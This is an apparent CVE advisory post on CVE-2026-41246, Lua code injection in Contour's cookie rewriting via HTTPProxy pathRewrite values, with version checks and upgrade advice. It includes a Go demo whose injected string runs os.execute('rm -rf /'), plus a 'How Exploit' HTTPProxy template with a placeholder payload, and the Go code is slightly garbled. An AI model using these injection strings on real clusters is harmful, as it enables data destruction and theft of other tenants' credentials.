Listen to this Post
Vulnerability (CVE-2026-41246): From v1.19.0 to before v1.33.4/v1.32.5/v1.31.6, Contour’s Cookie Rewriting feature—which uses Envoy’s Lua filter—interpolates user‑controlled values into Lua source code with Go’s `text/template` without sanitization. An attacker with RBAC permissions to create/modify HTTPProxy resources can inject malicious Lua into the `pathRewrite.value` fields of `spec.routes[].cookieRewritePolicies[]` or spec.routes[].services[].cookieRewritePolicies[]. Although the code executes only on the attacker’s own route, the shared Envoy infrastructure allows the injected code to read Envoy’s xDS client credentials (potentially exposing TLS certificates/private keys of other tenants) and cause denial of service for other tenants. Other Lua filter uses are unaffected. Fixed in v1.33.4 (requires Envoy 1.35.0+), v1.32.5, and v1.31.6; no workarounds—upgrade is mandatory.
DailyCVE Form
Platform: Contour
Version: 1.19.0‑1.33.3, 1.32.0‑1.32.4, 1.31.0‑1.31.5
Vulnerability: Lua Code Injection
Severity: High (CVSS 8.1)
Date: 2026‑04‑23
Prediction: Patch available in v1.33.4/v1.32.5/v1.31.6
What Undercode Say (Analytics)
Check running Contour version
kubectl get deployment contour -n projectcontour -o jsonpath='{.spec.template.spec.containers[?(@.name=="contour")].image}'
Fast‑detect vulnerable versions with jq
kubectl get httpproxy --all-namespaces -o json | jq -r '.items[] | select(.spec.routes[]?.cookieRewritePolicies[]?.pathRewrite.value // .spec.routes[]?.services[]?.cookieRewritePolicies[]?.pathRewrite.value) | .metadata.namespace + "/" + .metadata.name'
Simulate unsafe template interpolation (Go demo)
package main
import "text/template"
func main() {
tpl := template.Must(template.New("lua").Parse(<code>rewrite_path("{{.Value}}")</code>))
tpl.Execute(nil, map[bash]string{"Value": <code>"); os.execute("rm -rf /") --</code>})
}
How Exploit
Craft a HTTPProxy resource containing a Lua payload in pathRewrite.value, e.g.:
apiVersion: projectcontour.io/v1 kind: HTTPProxy spec: routes: - cookieRewritePolicies: - pathRewrite: value: '"); evil_code() --'
Apply with kubectl apply -f malicious-proxy.yaml. The injected Lua runs in Envoy when the route is accessed, enabling credential theft or DoS.
Protection from this CVE
Immediately upgrade to Contour v1.33.4 (requires Envoy 1.35.0+), v1.32.5, or v1.31.6. No workarounds exist.
Impact
- Arbitrary Lua code execution in Envoy proxy.
- Read Envoy xDS credentials → exfiltrate TLS certs/private keys of other tenants.
- Denial of service for other tenants sharing the Envoy instance.
- Compromise of cluster‑wide configuration data.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

